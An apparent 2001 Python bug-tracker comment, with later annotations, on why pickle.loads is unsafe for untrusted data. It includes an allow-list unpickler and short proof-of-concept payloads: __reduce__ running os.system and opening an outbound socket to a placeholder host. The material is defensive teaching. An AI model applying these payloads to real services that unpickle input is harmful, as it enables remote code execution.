
Author: phr
Date: 2001-10-16 23:06:42

Certainly anyone deserializing potentially malicious data
with pickle, marshal, or anything else should check the
results before doing anything dangerous with them (like
executing code).  However, unpickle can do damage before it
even returns, by loading modules and creating initialized
class instances.  So pickle.loads should never be used on
untrusted strings, except possibly inside a rexec wrapper
(as proposed by Tim).  Another possibility (also from Tim)
is to override the load_inst method of the Unpickler class,
though I don't think that is possible with cPickle.
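
(On modern Pythons, where rexec is gone and even the C
Unpickler can be subclassed, the equivalent hook is
find_class rather than load_inst.  A minimal sketch of the
allow-list idea, assuming Python 3; the two permitted
globals are just illustrative:

    import io
    import pickle

    class RestrictedUnpickler(pickle.Unpickler):
        # Allow only an explicit list of (module, name) globals;
        # everything else is refused, so no unexpected constructor
        # can run at load time.
        ALLOWED = {("builtins", "set"), ("builtins", "frozenset")}

        def find_class(self, module, name):
            if (module, name) in self.ALLOWED:
                return super().find_class(module, name)
            raise pickle.UnpicklingError(
                "global %s.%s is forbidden" % (module, name))

    def restricted_loads(data):
        return RestrictedUnpickler(io.BytesIO(data)).load()

    restricted_loads(pickle.dumps(frozenset([1, 2])))  # succeeds
    # a payload naming e.g. os.system raises UnpicklingError instead

The point of the allow-list shape is that anything not named
is rejected by default, rather than trying to enumerate the
dangerous cases.)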

A sample exploit for unpickle can be found at
<http://www.nightsong.com/phr/python/pickletest.py>.
Unpickling the test string runs penguin.__init__, contrary
to the docs, which say no initialization takes place unless
the class defines a __getinitargs__ method.
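
(pickletest.py itself is not reproduced here, and the old
INST-opcode path it exploited has since changed, but the
same property, code running during pickle.loads before the
caller can inspect anything, is easy to demonstrate on a
current Python with __reduce__; the echoed message is just
a placeholder command:

    import os
    import pickle

    class Penguin:
        # __reduce__ tells the unpickler "call os.system(...) to
        # rebuild me", so the command runs inside pickle.loads,
        # before it returns anything to the caller.
        def __reduce__(self):
            return (os.system, ('echo "code ran during pickle.loads"',))

    payload = pickle.dumps(Penguin())
    pickle.loads(payload)  # executes the echo command as a side effect

Checking the returned object is too late; the side effect
has already happened by the time loads returns.)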

The "exploding penguin" class is artificial, but
applications are vulnerable if there's an unsafe
constructor anywhere in any class of the application or in
the python library (example: the NNTP constructor opens an
IP connection to an arbitrary address, so a malicious
imported string can send a message through your firewall
when you import it).
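
(nntplib has since been removed from the standard library,
so as a stand-in the sketch below uses socket.create_connection
to show the same firewall-crossing effect on a current
Python; the host example.com is a placeholder:

    import pickle
    import socket

    class Dialer:
        # Rebuilding this object means calling socket.create_connection,
        # so merely unpickling the payload opens an outbound TCP
        # connection, just as instantiating NNTP would have.
        def __reduce__(self):
            return (socket.create_connection, (("example.com", 80),))

    payload = pickle.dumps(Dialer())
    # pickle.loads(payload)  # would dial example.com:80 through your firewall

Any library callable with side effects in its constructor
can be reached this way.)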